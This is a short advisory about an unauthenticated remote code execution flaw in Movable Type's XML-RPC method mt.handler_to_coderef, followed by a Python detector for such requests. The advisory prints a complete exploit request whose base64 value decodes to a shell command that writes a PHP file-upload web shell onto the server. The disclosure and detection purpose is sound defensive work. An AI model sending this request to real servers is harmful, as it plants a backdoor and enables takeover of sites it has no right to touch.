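A serious vulnerability in Movable Type was disclosed recently: by specifying mt.handler_to_coderef as the methodName in a SOAP protocol request, an attacker can get the content of the base64 value executed, for example: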
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
YGVjaG8gUEQ5d2FIQWdhV1lvSkY5UVQxTlVLWHRwWmloQVkyOXdlU2drWDBaSlRFVlRXeUl3SWwxYkluUnRjRjl1WVcxbElsMHNKRjlHU1V4RlUxc2lNQ0pkV3lKdVlXMWxJbDBwS1h0bFkyaHZJbGtpTzMxbGJITmxlMlZqYUc4aVRpSTdmWDFsYkhObGUyVmphRzhpUEdadmNtMGdiV1YwYUc5a1BYQnZjM1FnWlc1amRIbHdaVDF0ZFd4MGFYQmhjblF2Wm05eWJTMWtZWFJoUGp4cGJuQjFkQ0IwZVhCbFBXWnBiR1VnYm1GdFpUMHdQanhwYm5CMWRDQnVZVzFsUFRBZ2RIbHdaVDF6ZFdKdGFYUWdkbUZzZFdVOWRYQStJanQ5UHo0PSB8IGJhc2U2NCAtZCB8IHRlZSBmaWxlLXVwbG9hZGVyLnBocGA
</base64>
</value>
</param>
</params>
</methodCall>
The latest official release (v7.9.0) has fixed this.
Details: https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7
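
One way to spot the request shown above in captured HTTP bodies, added here as an example and not taken from the original post or from Movable Type: it flags any methodCall naming mt.handler_to_coderef and decodes its base64 parameters (tolerating missing padding) for analyst review. The function names, the finding fields and the sample bodies are assumptions constructed for illustration.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Method name taken from the page's sample request.
BLOCKED_METHODS = {"mt.handler_to_coderef"}


def decode_b64(text):
    """Decode base64 leniently: drop whitespace, restore missing padding."""
    compact = "".join((text or "").split())
    compact += "=" * (-len(compact) % 4)
    try:
        return base64.b64decode(compact)
    except (binascii.Error, ValueError):
        return None


def inspect_body(body: bytes):
    """Return a finding dict for a suspicious XML-RPC body, else None."""
    if b"<!doctype" in body.lower():
        # Refuse DTDs before parsing so entity tricks never reach the parser.
        return {"reason": "dtd-present", "method": None, "decoded": []}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "methodCall":
        return None
    method = (root.findtext("methodName") or "").strip()
    if method not in BLOCKED_METHODS:
        return None
    decoded = [decode_b64(el.text) for el in root.iter("base64")]
    return {"reason": "blocked-method", "method": method, "decoded": decoded}


def make_sample(method: str, payload: bytes) -> bytes:
    """Build a constructed request body; padding is stripped on purpose."""
    b64 = base64.b64encode(payload).rstrip(b"=").decode()
    return (
        '<?xml version="1.0" encoding="UTF-8"?><methodCall>'
        f"<methodName>{method}</methodName><params><param><value>"
        f"<base64>\n{b64}\n</base64></value></param></params></methodCall>"
    ).encode()


if __name__ == "__main__":
    # Constructed samples: one flagged call, one ordinary API call.
    print(inspect_body(make_sample("mt.handler_to_coderef", b"constructed sample 1")))
    print(inspect_body(make_sample("mt.supportedMethods", b"constructed sample 1")))
```

The decoded bytes are returned unmodified, so they can be logged or hashed for triage without being executed or written to disk.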